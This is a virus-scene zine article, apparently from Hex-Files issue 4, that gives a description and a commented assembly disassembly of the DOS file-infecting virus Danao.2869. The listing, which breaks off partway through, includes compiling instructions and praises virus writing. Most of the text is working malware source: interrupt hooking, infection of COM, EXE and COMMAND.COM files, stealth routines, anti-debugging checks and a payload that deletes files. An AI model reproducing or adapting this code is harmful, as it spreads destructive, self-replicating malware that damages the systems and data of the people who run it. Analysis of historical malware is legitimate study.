Copy Link
Add to Bookmark
Report
Hexfiles Issue 4 File 006
HEX-FILES No. 4 File 006
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Danao.2869
a disassembly by
YeZ
yez@rocketmail.com
Name : Danao.2869
Author : XED
Origin : Cebu, Philippines
For a description of the virus, we are giving way to the virus
encyclopedia (http://members.xoom.com/phil_av/encyc.htm#Danao)
of the Philippine AV Web Site:
It installs on top of memory decreasing memory by 5120 bytes. It
redirects Int 21h. To determine memory residency, it clears the BX
register and loads the AX register with 44FFh on an Int 21h call.
The memory resident virus returns the value of the flags register,
with the carry bit set, in BX.
It infects EXE and COM programs, including COMMAND.COM, when it is
executed or opened. Length of infected files increases by 2895
bytes except for COMMAND.COM which does not change. The virus is
located at end of all files. It attempts to infect COMMAND.COM
when it installs in memory.
It uses a file's time stamp to mark a file as infected. It
considers a file as infected if the value of the lower 4 bits
(bits 0 to 3) and the upper 4 bits (bits 4 to 7) of the time
stamp's low byte is the same, other than zero. It also checks a
certain location in the file if it contains 44FFh.
It is stealth. It returns the original length of the infected file
when you execute a DIR. At certain times, it removes itself from
an infected program when it is being read. This program is
reinfected when it is terminated. This is probably targeted
against self-checking programs.
It deletes a file after infecting 26 programs since becoming
memory resident. It deletes files after every 16th file infected
thereafter. The file deleted is the first directory entry in the
current directory.
It contains a text in the encrypted portion of the virus
by: XED of Danao,Cebu
"Vous a eu!"
There is also a creation date in BCD
04 19 94
which could represent April 19, 1994.
ÄÄ HF4LIST3.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS CONTAINS DESTRUCTIVE CODES ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS DOES INTENTIONAL DAMAGE ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± HEX-FILES No 4 ±±±
;±±±±±± ±±±±±±±±±±± ±±±
;±±±±±± Virus Name: Danao.2869 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Author : XED ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Origin : Cebu City, Philippines ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±
;±±±±±± Program listing created by YeZ <yez@rocketmail.com> ±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± COMPILING INSTRUCTION ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ~~~~~~~~~~~~~~~~~~~~~ ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±
;±±± This virus was originally compiled in TASM 2.0 and could only be ±±±
;±±± compiled without correction in TASM. This should be compiled in ±±±
;±±± one pass which means that nops should be preserved. ±±±
;±±± ±±±
;±±± MASM 5.0 would complain about AAM 0FFh and would insist on using ±±±
;±±± AAM without operand. This would produce D4 0A instead of D4 FF. ±±±
;±±± If you would still like to use MASM 5.0, replace lines containing ±±±
;±±± ±±±
;±±± aam 0ffh ±±±
;±±± with ±±±
;±±± dw 0ffd4h ±±±
;±±± ±±±
;±±± TASM 2.01 and A86 4.02 accept AAM 0FFh without a fuzz. :) ±±±
;±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± Greetz: ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± ±±±±±±±
;±±± XED: Write some more cool viruses man!!! ±±±±±±±
;±±± All our readers, virus programmers and supporters out there... ±±±±±±±
;±±± ±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± |YeZ| ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
ExeHeaderStruc struc
ExeSig dw ?
ExeImgLng dw ?
ExeSecLng dw ?
ExeRelocItm dw ?
ExeHeadLen dw ?
ExeMinAlloc dw ?
ExeMaxAlloc dw ?
ExeSs dw ?
ExeSp dw ?
ExeWrdChk dw ?
ExeIp dw ?
ExeCs dw ?
Exe1stReloc dw ?
ExeOvlNum dw ?
ExeHeaderStruc ends
fcb struc
fdriv db ? ; drive number
fname db 4 dup (?) ; base file name
fnamcmd db 4 dup (?)
fext db ? ; file extension
fextchk dw ?
fattr db ? ; file attribute
db 10 dup (?)
ftime dw ? ; file time stamp
fdate dw ? ; file date stamp
dw ?
fllen dw ? ; file length low word
fhlen dw ? ; file length high word
fcb ends
.model tiny
.code
org 0
com_entry equ 100h
command_line_len equ 80h
command_line_start equ command_line_len+2
FileInfMark equ 44ffh
IntVecTab21 equ 21h*4
TerminateVect equ 10
MemRequired1 equ offset EncryptBuff-offset Danao
MemRequired2 equ offset COMInit-offset Danao
DanaoTsrLen equ (MemRequired1+MemRequired2+90h)/16
VirusRelocator equ (DanaoTsrLen*16)-200h
VirusLen equ offset StackFrame + 34
;
;The first 7 bytes could be a part of the first generation codes.
;These contain garbage in succeeding generations.
;
Danao:
jmp FirstGeneration
db 4 dup (?)
;----------------------------------- INT 21 handler
I21Proc:
pushf
cmp ax,cs:[ChkVirPres] ;Check for virus presence
jne NotChkPress
stc ;Set carry flag
pushf ;Push flags
pop bx ;Pop flags to BX (Carry flag set=virus+) :)
popf
iret ;Back to calling program...
NotChkPress:
mov cs:[Int21FnAX],ax ;Save our AX DOS function
Dyna1:
cmp ah,3fh
Dyna2 equ word ptr $-1
nop
je SetHost4Infect
cmp ah,cs:[_findn] ;Find Next ah:12h?
je NopDynaNotIOCTL
cmp ah,cs:[_findf] ;Find First ah:11h?
je NopDynaNotIOCTL
cmp ax,cs:[_ioctl] ;IOCTL ax:4400h
jz NopDynaNotIOCTL
cmp ax,cs:[_exec] ;"our favorite" ax:4b00h
jz SetHost4Infect
cmp ah,cs:[_openf] ;open file ah:3dh
jz SetHost4Infect
popf
jmp cs:[I21] ;execute int 21h...
NopDynaNotIOCTL:
cmp ax,cs:[_ioctl] ;Is IOCTL ?
je LeaveDynaIOCTL
mov word ptr cs:[Dyna1],9090h ; patch cmp ah,3fh
mov word ptr cs:[Dyna2],9090h ; with nops
LeaveDynaIOCTL:
call CallI21 ;call real INT 21
jmp short SetHost4Infect
SetStealthFunc:
call DirStealth ;Do some directory stealthing :)
SetHost4Infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov byte ptr cs:[InfectErrFlag],0 ;Clear Error Flag
cmp ah,3fh ;Is it a read file function?
jne NotReadFunc
call ReadFuncInfect
NotReadFunc:
mov byte ptr cs:[TailLen],0
cmp ah,cs:[_findn] ;Is it a find next?
je SetStealthFunc
cmp ah,cs:[_findf] ;or a find first?
je SetStealthFunc
cmp ah,cs:[_openf] ;Is it an open file function
jne NotOFFunc
jmp short OpenFileProc
NotOFFunc:
mov cl,byte ptr ds:[command_line_len]
mov cs:[TailLen],cl
cmp word ptr cs:[Int21FnAX],4400h
jne OpenFileProc
test dl,70h ;Can the file be written to?
jz CallJmpRetRegsIret ;nop
xor dl,80h
test dl,80h ;Is it a Block Device
jnz OK4400 ;OK to infect
CallJmpRetRegsIret:
nop
call JmpRetRegsIret
OK4400:
push cs
pop es
mov di,offset ReadBuff
mov si,command_line_start
xor cx,cx
cmp byte ptr cs:[TailLen],80
jbe OKLoopVal
mov byte ptr cs:[TailLen],3
OKLoopVal:
mov cl,cs:[TailLen]
or cl,cl
jnz LoopValNZ
mov cx,3
LoopValNZ: ; converts filename to upper case
lodsb
cmp al,20h
je IgnoreSpace
cmp al,'.'
jne SkipCXReset
mov cx,4
SkipCXReset:
cmp al,'a'
jb StrChr
cmp al,'z'
ja StrChr
sub al,20h
StrChr:
stosb
IgnoreSpace:
loop LoopValNZ
mov byte ptr es:[di],0
sub di,3
cmp word ptr es:[di],'OC'
je Set4400Infect
cmp word ptr es:[di],'XE'
je Set4400Infect
jmp CallJmpRetRegsIret
Set4400Infect:
push es
pop ds
mov dx,offset ReadBuff
OpenFileProc: ;Open file function is called :)
mov cs:[FileOff],dx
mov cs:[FileSeg],ds
push ds
push dx
push ds
pop es
push cs
pop ds
mov di,dx
xor ch,ch
mov cl,20h
mov al,'.'
repne scasb
cmp word ptr es:[di],'OC' ;COM?
mov byte ptr cs:[FileType],1 ;Mark for COM file
je ChkCommand
cmp word ptr es:[di],'XE' ;EXE?
mov byte ptr cs:[FileType],0 ;Mark for EXE file
je HereNotCOM
cmp word ptr cs:[Int21FnAX],4400h
jne HereNotCOM
ChkCommand:
sub di,8
mov cx,7
mov si,offset CommandHost ;COMMAND.COM Offset
repe cmpsb ;Check if file is command.com?
jne HereNotCOM
mov byte ptr cs:[FileType],12 ;Mark for COMMAND.COM file
HereNotCOM:
pop dx
pop ds
mov di,dx
xor dl,dl ;set for default drive
cmp byte ptr [di+1],':' ;is the drive specified?
jne DrvNotSpec ;nop then use default drive
mov dl,[di] ;Get it
and dl,1fh ;Convert to drive number
DrvNotSpec:
mov cs:[DrvNum],dl ;Save it :) but don't mess with it :(
push cs
pop ds
push cs
pop es
mov ah,36h ;drive "DL" available space :)
call CallI21
cmp ax,0ffffh ;Is our Drive invalid?
jne ChkDskSize ;nop its not
jmp RetI24Iret ;YeZ "DL" drive is invalid :(
ChkDskSize:
mul bx
mul cx
or dx,dx ;Is it more than enough?
jnz CallChgAttrI24OF ;Yes it is more than enough
cmp ax,VirusLen ;Do we have space to allocate the virus?
jnb CallChgAttrI24OF ;Yes of coz!!! :)
jmp RetI24Iret ;Bye bye :(
CallChgAttrI24OF:
call ChgAttrI24OF
jnc MovHostHandle
jmp RetI24Iret
MovHostHandle:
mov bx,ax ;BX:handle :) !
SetUpHost:
xor cx,cx
xor dx,dx
mov ax,4202h
call CallI21
cmp byte ptr cs:[FileType],12 ;Is the file COMMAND.COM or what?
jne DNSubNotCommand ;nop
sub ax,VirusLen ;subtract with our virus size :) !!!
DNSubNotCommand:
mov cs:[HostSizeHi],dx ;Save the size
mov cs:[HostSizeLo],ax
cmp dx,0 ;Is the file larger than 64k ?
ja OkHostSize ;ok "ang size MALAKI!!! aaaaaYYYYY!!!!!"
cmp ax,400h ;Is it on the minimum size :)
jb JmpClsHostIret ;ay! "Maliit siya, hindi puwede ang maliit"
;"Walang Excitement pag maliit!!!!" :>
OkHostSize:
mov di,ax
add ax,0fh ;Give a 15 bytes allowance to the size
adc dx,0
and ax,0fff0h ;make it a 1 paragraph allowance :)
sub di,ax
mov cx,10h ;convert to paragraph
div cx
mov cs:[SizePara],ax ;how many paragraphs are there in this file
push cs
pop ds
cmp word ptr cs:[Int21FnAX],4500h
je ProcessHost
mov ax,5700h ;Get date/time
call CallI21
mov cs:[TimeStamp],cx ;Save time
mov cs:[DateStamp],dx ;Save date
xor ch,ch
or cx,cx
jz ProcessTime
call WiggleTime
or ax,ax
jz ProcessTime
cmp ax,cx
jnz ProcessHost
JmpClsHostIret:
jmp ClsHostIret
ProcessTime:
mov ax,cs:[TimeStamp]
mov al,11h
mov cs:[TimeStamp],ax
ProcessHost:
xor cx,cx
xor dx,dx
mov ax,4200h ;Goto beginning of file
call CallI21
push cs
pop ds
mov cx,28
mov dx,offset ReadBuff
mov si,dx
mov ah,3fh ;Read 28 bytes from start of file
call CallI21
xor cx,cx
xor dx,dx
mov ax,4200h ;Goto beginning of file
call CallI21
mov cx,28 ;Reread start of file for save
mov ah,3fh
mov dx,offset SavedHost
call CallI21
cmp word ptr cs:[ReadBuff],'ZM' ;EXE?
je EXEHostInfect
cmp byte ptr cs:[FileType],1 ;COM mark set?
je COMHostInfect
cmp byte ptr cs:[FileType],12 ;COMMAND.COM mark set?
je COMHostInfect
jmp ClsHostIret
COMHostInfect:
cmp word ptr cs:[SizePara],0f00h ;Is file more than F00H para?
jb COMNot2Big
jmp ClsHostIret
COMNot2Big:
call COMSetInfect
jmp short OKHostInfect
EXEHostInfect:
mov ax,cs:[ReadBuff.ExeSs]
mov cs:[SavedHost.ExeSs],ax
mov ax,cs:[ReadBuff.ExeSp]
mov cs:[SavedHost.ExeSp],ax
mov ax,cs:[ReadBuff.ExeIp]
mov cs:[SavedHost.ExeIp],ax
mov ax,cs:[ReadBuff.ExeCs]
mov cs:[SavedHost.ExeCs],ax
mov cs:[HostTypeFlag],ax
mov ax,cs:[si.ExeMinAlloc]
or ax,cs:[si.ExeMaxAlloc]
jz OKHostInfect ;Leave this exe alone
mov ax,cs:[HostSizeLo]
mov dx,cs:[HostSizeHi]
mov cx,200h ;Get size of EXE and divide it by 512 bytes
div cx
or dx,dx
jz NoNeedInc
inc ax
NoNeedInc:
mov cs:[si+4],ax ;Now Store
mov cs:[si+2],dx ; New Host size :)
mov ax,offset Danao_Entry
mov cs:[ReadBuff.ExeIp],ax
mov ax,cs:[SizePara]
sub ax,cs:[ReadBuff.ExeHeadLen]
mov cs:[ReadBuff.ExeCs],ax
mov cs:[ReadBuff.ExeSs],ax
add word ptr cs:[si+4],5
mov word ptr cs:[ReadBuff.ExeSp],offset EncryptBuff+32 ;Set SP
OKHostInfect:
xor cx,cx
mov dx,cx
mov ax,4200h ;Goto beginning of file
call CallI21
cmp byte ptr cs:[InfectCount],25 ;Check our counter :)
jle CallWrtVir
call PayloadDelFile ;Do our payload :)
mov ax,offset RetTime
jmp ax
CallWrtVir: ;Start writing the virus to the disk
call WriteVir
RetTime: ;This part is to return all datas
mov cx,cs:[TimeStamp]
mov dx,cs:[DateStamp]
mov ax,5701h ;Return file date/time :)
call CallI21
mov ax,cs:[Int21FnAX]
cmp ax,cs:[_exec] ;Is it 4b00h ?
jne ClsHostIret
mov word ptr cs:[ExecMark],0c000h ;Marker for 4b00 :)
ClsHostIret:
mov ah,3eh ;close host file
call CallI21
cmp byte ptr cs:[Int21FnAH],3dh ;Is it a read function?
jne RetAttr
cmp word ptr cs:[ExecMark],0c000h ;Is the EXEC marker set?
jne RetAttr
mov si,cs:[CodePatchCmpAh]
mov word ptr cs:[Dyna1],si ;Reset up our INTRO :)
mov si,cs:[CodePatch3fNop]
mov word ptr cs:[Dyna2],si
RetAttr:
mov cx,cs:[HostAttr]
mov ax,4301h ;Return host's attribute :)
lds dx,cs:[HostName]
call CallI21
RetI24Iret: ;Restore INT 24 and exit :)
mov ax,2524h ;Set INT 24
lds dx,cs:[I24]
call CallI21
mov ax,cs:[Int21FnAX]
cmp ax,cs:[_ioctl]
je RetRegsIret
cmp ax,4500h
je RetRegsIret
JmpI21: ;Back to go next INT 21 Chain :)
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp cs:[I21]
DirStealth: ;Directory stealth procedure...
mov ah,2fh ;Get DTA
call CallI21
push es
pop ds
cmp byte ptr [bx],0ffh ;Extended FCB?
jne NotExpFCB
add bx,7 ;adjust offset
NotExpFCB:
cmp word ptr [bx.fext],'XE' ;EXE?
je OKExtHost
cmp word ptr [bx.fext],'OC' ;COM?
jne JmpRetRegsIret
OKExtHost:
mov cx,[bx.ftime] ;Get time
cmp cl,0 ;Is it infected?
je JmpRetRegsIret ;Ouch! Yes :)
xor ch,ch
call WiggleTime
cmp ax,cx ;Can we infect this file?
jne JmpRetRegsIret ;!= then we cannot infect the file
cmp word ptr [bx.fhlen],0
ja OKSizeHost
cmp word ptr [bx.fllen],VirusLen+400h
jbe JmpRetRegsIret
OKSizeHost:
cmp word ptr [bx.fextchk],'EX' ;EXE?
je SubVirSize
cmp word ptr [bx.fextchk],'MO' ;COM?
jne JmpRetRegsIret
cmp word ptr [bx.fname],'OC' ;COMMAND.COM?
jne SubVirSize
cmp word ptr [bx.fnamcmd],'NA' ;CO??AN* verify if
je JmpRetRegsIret ; really COMMAND.COM
SubVirSize:
sub word ptr [bx.fllen],VirusLen ;Subtract from virus size
sbb word ptr [bx.fhlen],0 ;Adjust on carry
JmpRetRegsIret:
pop ax
RetRegsIret:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
iret
RetReadFuncInfect:
pop ds
pop dx
pop cx
jmp JmpI21
ReadFuncInfect: ;Called if read function is being done
pop ax
push cx
push dx
push ds
mov ax,5700h ;Get date/time
call CallI21
mov cs:[TimeStamp],cx ;Save time
mov cs:[DateStamp],dx ;Save date
xor ch,ch ;nul CH
or cx,cx ;check if 0 "infected" ?
jz RetReadFuncInfect ;Yes
call WiggleTime
cmp ax,cx
jne RetReadFuncInfect
mov ax,4201h ;Get current file pointer
xor dx,dx
xor cx,cx
call CallI21
mov word ptr cs:[CurPtrPosHi],ax
mov word ptr cs:[CurPtrPosLo],dx
or ax,ax
jnz RetReadFuncInfect
or dx,dx
jnz RetReadFuncInfect
push cs
pop ds
mov ax,4200h
xor cx,cx
xor dx,dx
call CallI21
mov cx,28
mov dx,offset ReadBuff
mov ah,3fh
call CallI21
mov ax,4200h
xor dx,dx
xor cx,cx
call CallI21
cmp word ptr cs:[ReadBuff],'ZM'
mov byte ptr cs:[FileType],0
je OKRI1
cmp byte ptr cs:[ReadBuff+1],0e9h
mov byte ptr cs:[FileType],01
je OKRI1
jmp RetReadFuncInfect
OKRI1:
xor cx,cx
xor dx,dx
mov ax,4202h ;Get file size
call CallI21
sub ax,VirusLen
sbb dx,0
mov cs:[HostSizeLo],ax
mov cs:[HostSizeHi],dx
mov cx,dx
mov dx,ax
add dx,0fh ;Setting Up
adc cx,0 ; File Pointer
and dx,0fff0h ; Towards the Infection
add dx,offset ChkVirPres ; Signature
adc cx,0 ; 44FFH :) Infection Sig.
mov ax,4200h
call CallI21
mov ah,3fh
mov cx,30
mov dx,offset StealthBuff
call CallI21
mov si,dx
cmp word ptr [si],FileInfMark ;File Infection Marker
je VirIsXED
jmp RetReadFuncInfect
VirIsXED:
xor cx,cx
xor dx,dx
mov ax,4200h
call CallI21
mov si,bx
call ChgAttrI24OF ;Infect file :)
jnc ReadOFOK
mov ax,2524h
lds dx,cs:[I24]
call CallI21
jmp RetReadFuncInfect
ReadOFOK:
push cs
pop ds
mov bx,ax
mov ah,40h
mov cx,28
mov dx,offset StealthBuff+2
call CallI21
mov cx,cs:[HostSizeHi]
mov dx,cs:[HostSizeLo]
mov ax,4200h
call CallI21
xor cx,cx
mov ah,40h
call CallI21
mov cx,word ptr cs:[CurPtrPosLo]
mov dx,word ptr cs:[CurPtrPosHi]
mov ax,4200h
call CallI21
mov ax,cs:[TimeStamp]
mov cl,4
ror ax,cl
shl ax,cl
shr ax,cl
rol ax,cl
mov cs:[TimeStamp],ax
mov cx,ax
mov dx,cs:[DateStamp]
mov ax,5701h
call CallI21
mov ah,3eh
call CallI21
pop ds
pop dx
pop cx
mov bx,si
mov ah,3fh
call CallI21
push bp
mov bp,sp
mov [bp+12],cx
mov [bp+16],ax
pushf
pop [bp+18]
pop bp
mov dx,offset I22Proc
push cs
pop ds
mov word ptr cs:[Int21FnAX],4500h
mov word ptr cs:[Dyna1],9090h
mov word ptr cs:[Dyna2],9090h
cmp word ptr cs:[ExecMark],0c000h
jne ReadNDExec
mov word ptr cs:[ExecMark],1 ;Change mark
push es
push bx
mov ax,3522h ;Get INT 22h
call CallI21
mov cs:[I22Off],bx
mov cs:[I22Seg],es
pop bx
pop es
mov ah,51h ;Get PSP
call CallI21
mov ds,bx
push dx
pop word ptr ds:[TerminateVect]
push cs
pop word ptr ds:[TerminateVect+2]
jmp RetAttr
ReadNDExec:
jmp SetUpHost
ChgAttrI24OF: ;This procedure is to set up file
push es ; for infection :)
call GetChgI24
pop es
mov ax,4300h ;Get our attribute
lds dx,cs:[HostName]
call CallI21
mov cs:[HostAttr],cx ;Save it
mov ax,4301h ;Change our attribute
mov cx,20h ;Write enabled, archieve possitive :)
call CallI21
cmp byte ptr cs:[InfectErrFlag],0
je OF4Infect
stc
ret
OF4Infect: ;Open file host file
lds dx,cs:[HostName] ; to be infected!!! :)
mov ax,3d02h
call CallI21
ret
I22Proc:
nop
mov word ptr cs:[ExecMark],0c000h
lds dx,cs:[HostName]
mov ah,3dh
int 21h
mov bx,ax
mov ah,3eh
call CallI21
jmp cs:[I22]
WriteVir: ;Write the virus to the COM file :)
mov cx,28
mov dx,offset ReadBuff
mov ah,40h ;Write our header
call CallI21
mov ax,10h
mov si,cs:[SizePara] ;Load how many paragraphs are there?
mul si ;Convert paragraphs to bytes
mov cx,dx
mov dx,ax
mov ax,4200h ;Move our file pointer
call CallI21
cmp byte ptr cs:[FileType],0 ;EXE?
je ExeCommand
cmp byte ptr cs:[FileType],12 ;COMMAND.COM?
jne ExeCommand
xor cx,cx
mov dx,cs:[HostSizeLo]
sub dx,di
mov ax,4200h ;Adjust file pointer to give
call CallI21 ; one paragraph allowance
ExeCommand:
xor byte ptr cs:[LowParaLen],15
inc byte ptr cs:[InfectCount] ;Increment our counter
call DecryptEncMes
mov dx,offset EncryptBuff
mov cx,MemRequired2 ;Encrypted part of the virus.
mov ah,40h ;Write encrypted part of the virus :)
call CallI21
mov cx,MemRequired2
mov ax,VirusLen
sub ax,cx
mov cx,ax ;Get remaining bytes to write :)
mov dx,offset COMInit
add cx,di
mov ah,40h ;Write unencrypted part of the virus
call CallI21
call SetVirMark
ret
PayloadDelFile: ;This is our payload!!! :)
mov ah,1ah ; (Deletes file) :)
mov dx,offset StealthBuff
call CallI21
mov word ptr cs:[SearchMask],'.*'
mov word ptr cs:[SearchMask2],'*'
mov dx,offset SearchMask ;Load Virus Extended Data :)
mov ah,4eh ;Search for file
mov cx,20h
call CallI21
mov dx,offset StackFrame ;Offset of our lucky file :)
mov ah,41h ;Delete it!!!
call CallI21
mov byte ptr cs:[InfectCount],10 ;Reset our counter to 10 :)
ret
COMSetInfect: ;Setting for COM infection :)
mov ax,cs:[ReadBuff]
mov cs:[ComHostSave1],ax
mov ax,cs:[ReadBuff+2]
mov cs:[ComHostSave2],ax
mov ax,cs:[ReadBuff+4]
mov cs:[ComHostSave3],ax
mov byte ptr cs:[ReadBuff],0e9h
mov ax,16
mov si,cs:[SizePara]
mul si ;Convert paragraph to bytes :)
add ax,offset Danao_Entry - 3 ;add :)
mov cs:[ReadBuff+1],ax
mov ax,cs:[ReadBuff]
add ax,cs:[ReadBuff+2]
neg ax
mov cs:[ReadBuff+4],ax
mov word ptr cs:[HostTypeFlag],9090h
ret
WiggleTime:
mov ax,cx
mov dx,ax
mov cl,4
shr ax,cl
shl dl,cl
ror dx,cl
mov cx,dx
ret
SetVirMark: ;Set virus marker :)
push ax
mov ax,cs:[TimeStamp]
xor ah,ah
mov dx,ax
mov cl,4
shr ax,cl
shr dx,cl
rol dx,cl
add dx,ax
mov ax,cs:[TimeStamp]
mov dh,ah
mov cs:[TimeStamp],dx
pop ax
ret
GetChgI24: ;Procedure to save and change INT 24
mov ax,3524h
call CallI21
mov cs:[I24Off],bx
mov cs:[I24Seg],es
push cs
pop ds
mov dx,offset I24Proc
mov ax,2524h
call CallI21
ret
CallI21:
pushf
call cs:[I21]
ret
CommandHost db 'COMMAND.COM',0
EncXEDMes db 'by: XED of Danao,Cebu' ; author and residence
db 4,19h,94h ; date written?
db ' "Vous a eu!" ' ; what's this?????
db 0
EncXEDMesLen equ $-EncXEDMes
I21 label dword ;this are the initial values and
I21Off dw 40ebh ;constant in the virus. we dont intend
I21Seg dw 1 ;to create lame variants dont we?
XEDMsg db (EncXEDMesLen-1) dup (?)
;------------------------------------------------- INT 24H handler
I24Proc:
nop
xor al,al
mov byte ptr cs:[InfectErrFlag],14
iret
DecryptEncMes:
nop
push es
push di
push si
push ds
pop es
mov si,offset EncXEDMes
mov ax,offset XEDMsg
mov di,offset EncryptBuff
add di,ax
cld
DecryptUnkLoop:
lodsb
or al,al
je FinDecryptLoop
rol al,1
stosb
jmp DecryptUnkLoop
FinDecryptLoop:
pop si
pop di
pop es
ret
RAMProc:
nop
mov ah,52h ;Get DOS List
call CallI21
mov ax,es:[bx-2] ;Get first MCB :)
mov es,ax ;Get that block address
mov ax,es:[1] ;Get MCB owner
mov cs:[ExecMark],ax
mov es,cs:[Psp]
mov ds,cs:[Psp]
sub word ptr ds:[2],DanaoTsrLen+1
mov bp,word ptr ds:[2]
mov dx,ds
sub bp,dx
mov ah,4ah ;Resize our RAM block
mov bx,0ffffh ;Use the entire RAM wow!!!!
call CallI21 ;Of coz this is really impossible
mov ah,4ah ;So we will just use the remaining RAM
call CallI21 ; :)
dec dx
mov ds,dx
cmp byte ptr ds:[0],'Z' ;Are we the last block or what
jne LastRAMblk ;Nop
mov byte ptr ds:[0],'M' ;Make us not the last one :)
LastRAMblk: ;Create another RAM block
nop
mov ax,word ptr ds:[3]
mov bx,ax
sub ax,141h
add dx,ax
mov word ptr ds:[3],ax
inc dx
mov es,dx
mov byte ptr es:[0],'Z' ;Mark this one as last :)
push word ptr cs:[ExecMark]
pop word ptr es:[1]
mov word ptr es:[3],DanaoTsrLen
inc dx
mov es,dx
mov word ptr es:[ExecMark],0c000h ;Yes Yes Execute mark :)
mov word ptr es:[Int21FnAX],4b00h ;Execute our Host program now
ret
;########################
;End of encrypted portion
;########################
COMInit:
xor sp,sp ;Anti tunneling I guess :)
mov bx,10h
DeltaSub:
call $+3
pop cx
mov ax,cs
sub cx,offset DeltaSub
mul bx ;Convert Segment to offset
add ax,cx ;Add offset start of virus
adc dx,0
div bx ;Get segment of start of virus
push ax
mov ax,offset AdjustOrgSeg ;Our new offset
push ax
retf ;Readjust our SEG:OFF :)
AdjustOrgSeg:
push ss
pop word ptr cs:[Psp] ;Save PSP segment
xor bx,bx
mov ax,cs:[ChkVirPres] ;Check if virus is present in RAM
int 21h
push bx
popf
jnc COM_Infect_system ;Nop, RAM is still fresh for infection
jmp short COM_Ret_Host ;Already infected :)
COM_Infect_system:
push cs
pop ds
push ds
pop es
mov si,0
mov di,si
mov cx,MemRequired2
call DecryptTop ;Decrypt the virus top encrypted portion
mov ax,cs:[Psp]
mov es,ax
jmp GetI21
COM_Ret_Host:
mov ax,cs:[Psp]
mov ss,ax
mov ds,ax
mov es,ax
mov sp,-2
mov ax,cs:[ComHostSave1]
mov word ptr ds:[com_entry],ax
mov ax,cs:[ComHostSave2]
mov word ptr ds:[com_entry+2],ax
mov ax,cs:[ComHostSave3]
mov word ptr ds:[com_entry+4],ax
push ds
mov bx,com_entry
push bx
retf
;
;This is the initial point of the virus in the infected file
;
Danao_Entry:
mov ax,0 ;INTRO INSTRUCTION :)
org $-2
Flip1:
mov bx,ss
adc ax,7533h
jc Flip1
;-------------------------*** MASM FIX: ***---- replace this with
aam 0ffh ; dw 0ffd4h
;---------------------------------------------- if using masm 5.0
mov al,ah
add bx,0ffdh
mov ds,ax
mov bx,6
cmp word ptr [bx],80h ;Check segment of int 01 in IVT
jb Chk_I3
mov dx,0cfh
call DisableI1
jnc Terminate
db 0
Terminate:
mov bx,TerminateVect
jmp dword ptr es:[bx]
;--------------------------;
jns Flip1 ;;-------> not executed
ret ;;
db 0d4h,0ffh,0 ;;
mov ax,2788h ;;
;--------------------------;
Chk_I3:
mov bx,14
cmp word ptr [bx],80h ;Check segment of int 03 in IVT
ja Terminate
cmp sp,2000h
jb EXEInit ;Assumes an exe file
